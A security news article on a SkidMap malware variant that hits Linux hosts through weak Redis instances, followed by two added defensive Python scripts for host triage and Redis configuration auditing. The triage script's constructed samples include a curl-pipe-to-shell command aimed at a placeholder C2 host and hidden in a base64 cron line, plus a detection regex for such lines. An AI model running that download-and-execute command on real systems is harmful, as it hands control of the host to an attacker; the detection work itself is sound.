A new variant of the SkidMap malware is being used in a campaign targeting a wide range of Linux distributions, including Alibaba, Anolis, openEuler, EulerOS, Stream, CentOS, RedHat, and Rock.

The malware, first spotted in September 2019 as a cryptocurrency-mining botnet, has since evolved to load malicious kernel modules that hide its activity from detection.

During their analysis, researchers at Trustwave found at least two Linux variants of SkidMap, and the targeted distribution shapes the infection flow: one variant is built for Debian/Ubuntu and the other for RedHat/CentOS.

Infection process

The attack chain begins with the attackers brute-forcing their way into unsecured, internet-exposed Redis instances and writing Redis keys whose values hold a base64-encoded cron task.
  • Once a poorly secured Redis instance is breached, a dropper shell script is deployed that retrieves an ELF binary hidden inside a GIF image file.
  • The binary adds the attackers' SSH key to /root/.ssh/authorized_keys, disables SELinux, and sets up a reverse shell that calls back to the attacker-controlled server every 60 minutes.
  • Based on the targeted Linux distribution and the kernel it runs, a matching package (gold, stream, or euler) is downloaded from the C2 server.
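
The host-side artifacts that the chain above leaves behind are what an administrator would triage first. The following script is an added example, not Trustwave's tooling or the malware's own code: it decodes a cron entry that pipes base64 into a shell, flags any key in /root/.ssh/authorized_keys that is not on an allowlist of known fingerprints, and reports SELinux set to disabled. All inputs are constructed samples (the keys are synthetic blobs, the C2 URL is an example.invalid placeholder); on a real host you would read the actual files.

```python
"""Host triage for the persistence artifacts described above.

Added example, not Trustwave's analysis tooling or the malware's own code.
It checks the three things the dropper leaves on a host according to the
article: a cron entry that decodes base64 into a shell, an attacker key
appended to /root/.ssh/authorized_keys, and SELinux disabled. Every input
below is a constructed sample; on a live host read the real files instead.
"""
from __future__ import annotations

import base64
import hashlib
import re
import struct

# A cron command of the form: echo <base64> | base64 -d | sh
_B64_CRON = re.compile(
    r"echo\s+[\"']?(?P<b64>[A-Za-z0-9+/=]{16,})[\"']?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)
_KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def decode_cron_payloads(crontab_text: str) -> list[tuple[str, str]]:
    """Return (cron line, decoded command) for entries that pipe base64 into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = _B64_CRON.search(line)
        if m:
            decoded = base64.b64decode(m.group("b64")).decode("utf-8", "replace")
            hits.append((line, decoded))
    return hits


def openssh_fingerprint(authorized_keys_line: str) -> str:
    """SHA256 fingerprint in OpenSSH's 'SHA256:<unpadded base64>' form.

    Tolerates a leading options field (e.g. command="...") before the key type.
    """
    parts = authorized_keys_line.split()
    for i, token in enumerate(parts[:-1]):
        if token.startswith(_KEY_TYPES):
            blob = base64.b64decode(parts[i + 1])
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("no public key in line: %r" % authorized_keys_line)


def unknown_authorized_keys(authorized_keys_text: str, allowlist: set[str]) -> list[str]:
    """Fingerprints of keys that are not on the administrator-maintained allowlist."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            fp = openssh_fingerprint(line)
            if fp not in allowlist:
                unknown.append(fp)
    return unknown


def selinux_disabled(selinux_config_text: str) -> bool:
    """True when /etc/selinux/config sets SELINUX=disabled (off persistently, across reboots)."""
    for line in selinux_config_text.splitlines():
        line = line.strip()
        if line.startswith("SELINUX="):
            return line.split("=", 1)[1].strip().strip('"').lower() == "disabled"
    return False


# ---- constructed samples (not real keys, not real IOCs) ----------------------

def _fake_ed25519_key(seed: int, comment: str) -> str:
    """Build a syntactically valid ssh-ed25519 line; the 32 key bytes are a hash, not a real key."""
    key_bytes = hashlib.sha256(seed.to_bytes(4, "big")).digest()
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + key_bytes
    return "ssh-ed25519 %s %s" % (base64.b64encode(blob).decode(), comment)


ADMIN_KEY = _fake_ed25519_key(1, "admin@bastion")
ATTACKER_KEY = _fake_ed25519_key(2, "root@localhost")
SAMPLE_AUTHORIZED_KEYS = ADMIN_KEY + "\n" + ATTACKER_KEY + "\n"
ALLOWLIST = {openssh_fingerprint(ADMIN_KEY)}

SAMPLE_PAYLOAD = "curl -fsSL http://c2.example.invalid/init.sh | sh"  # constructed C2 URL
_CRON_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_CRONTAB = (
    "# constructed sample of /var/spool/cron/root\n"
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
    "*/1 * * * * echo " + _CRON_B64 + " | base64 -d | bash\n"
)
SAMPLE_SELINUX_CONFIG = "# constructed /etc/selinux/config\nSELINUXTYPE=targeted\nSELINUX=disabled\n"


def triage() -> dict:
    """Run all three checks over the samples and return the findings."""
    return {
        "cron_payloads": decode_cron_payloads(SAMPLE_CRONTAB),
        "unknown_keys": unknown_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST),
        "selinux_disabled": selinux_disabled(SAMPLE_SELINUX_CONFIG),
    }


if __name__ == "__main__":
    for name, result in triage().items():
        print(name, result)
```

The allowlist is keyed on fingerprints rather than key comments because the comment field is free text and a dropper can write whatever it likes there (the constructed attacker key above is labelled root@localhost for exactly that reason). Checking /etc/selinux/config catches the persistent change; a runtime `setenforce 0` would show up in `getenforce` instead, so check both on a live host.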
 

Linux machines are increasingly under attack

  • Recently, an advanced rootkit called Reptile was reported targeting Linux systems in South Korea. The rootkit includes a reverse shell feature, enabling attackers to swiftly access targeted systems. 
  • Separately, the Rekoobe backdoor, associated with the Chinese APT31 group, has been used in attacks on Linux systems at South Korean companies.

Conclusion 

If a Linux system has been compromised, administrators should use the IOCs shared by the researchers to find and remove the malware, its kernel modules, and the dropped scripts, and should look for the persistence this campaign leaves behind: unexpected entries in /root/.ssh/authorized_keys, base64-encoded cron jobs, and SELinux switched off. In this case the initial access is an unsecured Redis server. Redis's own mitigation is 'protected mode', available since version 3.2.0: when the server has neither a bind directive nor a password configured, it answers only clients on the loopback interface. It offers no protection once an administrator binds the service to all interfaces, turns the mode off, or sets a password weak enough to brute-force. Beyond that, both the Linux hosts and the Redis instances should be secured with a strong password (requirepass, or ACL users on Redis 6 and later), with Redis bound only to trusted interfaces, and with network access limited to trusted clients on a restricted network.
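
To make the Redis side of that advice concrete, the following audit is an added example (not Redis's code or the researchers' tooling): it parses a redis.conf and reports the three settings that leave an instance open to this campaign, with a constructed weak configuration beside a hardened one. The 16-character password threshold is our own choice, not something Redis enforces.

```python
"""Audit a redis.conf for the settings the mitigation above relies on.

Added example; it is not Redis's code or the researchers' tooling. It reads
the directives Redis takes from redis.conf and reports the three conditions
that turn an instance into the kind of target this campaign brute-forces:
protected mode switched off, a bind on every interface, and no password.
The two configurations at the bottom are constructed samples.
"""
from __future__ import annotations

import shlex

MIN_PASSWORD_LEN = 16  # assumption: our own bar for "strong", not a Redis requirement
_ANY_ADDRESS = ("0.0.0.0", "::", "*")


def parse_redis_conf(text: str) -> dict[str, list[str]]:
    """Map each directive to its argument list; a repeated directive keeps its last value."""
    conf: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf[parts[0].lower()] = parts[1:]
    return conf


def audit_redis_conf(text: str) -> list[str]:
    """Return one finding per weak setting; an empty list means the three checks pass."""
    conf = parse_redis_conf(text)
    findings: list[str] = []

    # Protected mode (Redis >= 3.2.0) only refuses non-loopback clients while the
    # server has neither a bind directive nor a password; turning it off removes
    # that last line of defence.
    if conf.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: external clients are accepted even without bind or a password")

    bind = conf.get("bind")
    if bind is None:
        findings.append("no bind directive: the server listens on every interface, protected mode is all that stops outsiders")
    elif any(addr.lstrip("-") in _ANY_ADDRESS for addr in bind):
        findings.append("bind %s: the instance is reachable on every interface" % " ".join(bind))

    password = conf.get("requirepass")
    if not password or not password[0]:
        findings.append("no requirepass: any client that reaches the port has full command access")
    elif len(password[0]) < MIN_PASSWORD_LEN:
        findings.append("requirepass shorter than %d characters: a short password is what the brute-force step targets" % MIN_PASSWORD_LEN)
    return findings


# ---- constructed samples -----------------------------------------------------

WEAK_CONF = """\
# the configuration the campaign looks for: reachable from anywhere, no auth
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """\
# loopback only; the '-' prefix (Redis 6.2+) skips the address if it is absent
bind 127.0.0.1 -::1
protected-mode yes
port 6379
# placeholder only: generate a long random secret, or use ACL users on Redis 6+
requirepass replace-me-with-a-long-random-secret-4f9c1e
"""


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["ok"])
```

A stock redis.conf with no bind and no requirepass passes only because protected mode is on by default; the audit still reports the missing bind and password, since an operator who later flips protected-mode to "no" to make a client work would silently end up with the weak configuration.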
Cyware Publisher